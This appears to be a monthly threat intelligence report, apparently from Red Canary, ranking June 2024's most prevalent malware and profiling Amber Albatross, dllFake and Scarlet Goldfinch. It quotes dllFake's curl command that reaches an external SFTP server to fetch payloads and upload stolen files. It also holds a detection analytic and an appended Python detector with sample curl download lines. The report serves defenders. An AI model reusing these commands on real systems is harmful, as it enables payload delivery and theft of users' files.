Highlights from June
ChromeLoader hit the top spot on our top 10 most prevalent threat list this month, in part due to changes in the way Red Canary detects this threat. ChromeLoader last appeared in the top 10 in October 2023 and was our 6th most prevalent threat for all of 2023.
Several threats dropped out of the rankings altogether, including Gootloader and PlugX, after many consecutive months in the top 10.
We have two newcomers to our top 10 list this month. Amber Albatross, coming in 4th place, may be new to the rankings but we began tracking it in January 2024. The activity starts with a potentially unwanted program (PUP) and ultimately leads to a pyInstaller executable with stealer capabilities. Read more about Amber Albatross below.
The other newcomer, making its debut on our list as one of our ties for the 6th spot, is dllFake. dllFake is a malware family—first publicly reported and named by Rapid7 in June 2024—that primarily targets browsers and crypto wallets. You can read more about it below.
This month’s Top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for June 2024:
Month's rank | Threat name | Threat description
---|---|---
⬆ 1 | ChromeLoader | Malware that modifies victims’ browser settings and redirects user traffic to advertisement websites
⬇ 2 | | Collection of Python classes to construct/manipulate network protocols
⬆ 3 | | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drive
⬆ 4 | Amber Albatross | Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities
⬆ 5 | | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access
⬆ 6* | Adload | macOS malware that attempts to hijack and redirect user web browsing traffic
⬇ 6* | Atomic Stealer | Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets
⬆ 6* | | Penetration testing tool that integrates functionality from multiple offensive security projects and has the ability to extend its functionality with a native scripting language
⬆ 6* | dllFake | Malware family that can collect keystrokes and steal information from browsers, crypto wallets, and the user's clipboard
⬆ 6* | LummaC2 | Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads
⬆ 6* | Scarlet Goldfinch | Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems
⬇ 6* | | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code

⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
* Denotes a tie
Amber Albatross unleashed by PUPs
Amber Albatross is a Red Canary-named activity cluster that begins with a PUP-bundled installation and leads to a pyInstaller executable with stealer-like capabilities. We started observing and tracking Amber Albatross in January 2024.
Amber Albatross is delivered via a setup file downloaded and executed by certain PUPs. We have observed Amber Albatross bundled in downloads from PcAppStore, Bit Guardian’s Bit Driver Updater, and Malware Crusher. The installed PUP executes an installer—sometimes an InnoSetup installer—that drops and executes a binary like this one. That binary in turn makes network connections to external sites, for example creaper[.]world or servers-servers-servers[.]com, and downloads additional binaries, ultimately unpacking a pyarmor-obfuscated pyInstaller executable.
This final executable launches via CMD and PowerShell, typically running as a process named with numbers and no extension. We’ve seen it run checks to see if it’s running in a virtual environment, to determine if AV is installed, as well as querying browser and system information. While we cannot at this time discern how Amber Albatross uses this information, we find it suspicious enough to warrant continued tracking and monitoring.
The DL on dllFake
Our second newcomer to the top 10 list this month is dllFake, which we first observed in June 2024. dllFake is a malware family that primarily targets browsers and crypto wallets. It is reportedly distributed by compromised Notezilla, RecentX, and Copywhiz software.
It uses files, including EXE and BAT files with names similar to dllBus.bat and dllCrt32.exe, for initial execution. It creates a scheduled task (one observed task name was Check dllHourly32) to achieve persistence. dllFake uses curl to reach out to SFTP to download additional payloads and upload collected information, using commands like:
curl.exe -s -k --connect-timeout 30 sftp://104.206.2[.]18:2265/PHN/dll_valid.php?a=26735 --user username:password
It looks for TXT, DOC, PNG and JPG files and uploads them back to the SFTP server via curl. The second stage—also downloaded via curl—can copy clipboard data and keystrokes.
The use of curl to download tools and upload data gives us a detection opportunity.
Detection opportunity: curl initiating an external network connection to an IP address
This pseudo detection analytic identifies curl initiating an external network connection to an IP address. Adversaries and malware like dllFake will leverage curl to initiate a network connection to a remote IP address for purposes of writing an additional payload to disk or creating a reverse shell. Administrators may download remote files using similar commands, making it important to validate the IP address and any files written to disk.
process == (curl)
&&
command_line_includes == (<IP address:port>)
&&
command_line_may_include == (-o)
&&
command_line_does_not_include == (*)
Note: * is a placeholder for strings associated with legitimate use of curl in your environment
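One way to turn the pseudo analytic above into runnable detection logic, as an added example that is not Red Canary's own code: it evaluates process events against the four conditions (curl process, literal IP:port in the command line, optional -o, no allowlisted string) and reports what an analyst needs to validate. The event shape, the sample command lines (built from RFC 5737 test addresses) and the allowlist markers are all constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# A bare IPv4 address, optionally with :port, surrounded by non-name characters.
# The literal IP (rather than a hostname) is the signal this analytic keys on.
IP_PORT_RE = re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?(?![\w.])")

# Constructed placeholder for the "*" in the analytic: strings that mark
# legitimate curl use in your environment. Tune per environment.
LEGIT_CURL_MARKERS = ("updates.example-internal.local", "--version")


@dataclass
class ProcessEvent:          # assumed minimal EDR process-event shape
    process: str
    command_line: str


def matches_curl_ip_analytic(ev: ProcessEvent, allowlist=LEGIT_CURL_MARKERS) -> Optional[dict]:
    """Return validation details if the event matches the analytic, else None."""
    image = re.split(r"[\\/]", ev.process)[-1].lower()
    if image not in ("curl", "curl.exe"):                       # process == (curl)
        return None
    cl = ev.command_line
    if any(m.lower() in cl.lower() for m in allowlist):         # does_not_include == (*)
        return None
    ips = IP_PORT_RE.findall(cl)
    if not ips:                                                 # includes == (<IP address:port>)
        return None
    return {
        "ip": ips[0],
        # may_include == (-o): a file written to disk is what the analyst should inspect
        "writes_to_disk": bool(re.search(r"(?:^|\s)-[oO](?:\s|$)|--output\b", cl)),
        "sftp": "sftp://" in cl.lower(),
    }


# Constructed sample events modelled on the dllFake pattern and on benign admin use.
SAMPLE_EVENTS = [
    ProcessEvent("curl.exe", "curl.exe -s -k --connect-timeout 30 sftp://198.51.100.23:2265/PHN/dll_valid.php?a=26735 --user u:p"),
    ProcessEvent("C:\\Windows\\System32\\curl.exe", "curl.exe http://203.0.113.9:8080/update.exe -o C:\\Users\\Public\\update.exe"),
    ProcessEvent("curl.exe", "curl.exe -s https://updates.example-internal.local/agent.msi -o agent.msi"),
    ProcessEvent("curl.exe", "curl.exe -s https://www.example.com/api/health"),
]


def run_samples():
    """Evaluate every sample event; only the first two should match."""
    return [matches_curl_ip_analytic(e) for e in SAMPLE_EVENTS]
```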
In case you missed it: Scarlet Goldfinch leverages NetSupport Manager
Scarlet Goldfinch is a cluster of activity that Red Canary named and first observed in June 2023. This threat deceives users into downloading a file masquerading as a browser update, which starts a chain of activity eventually leading to the installation of NetSupport Manager. NetSupport Manager is a remote monitoring and management (RMM) tool that provides the adversary remote control over a system.
On June 26, Alex Berninger and Red Canary published a blog and video discussing Scarlet Goldfinch, its use of RMM tools, and offering insights into how defenders can protect their organizations from this threat.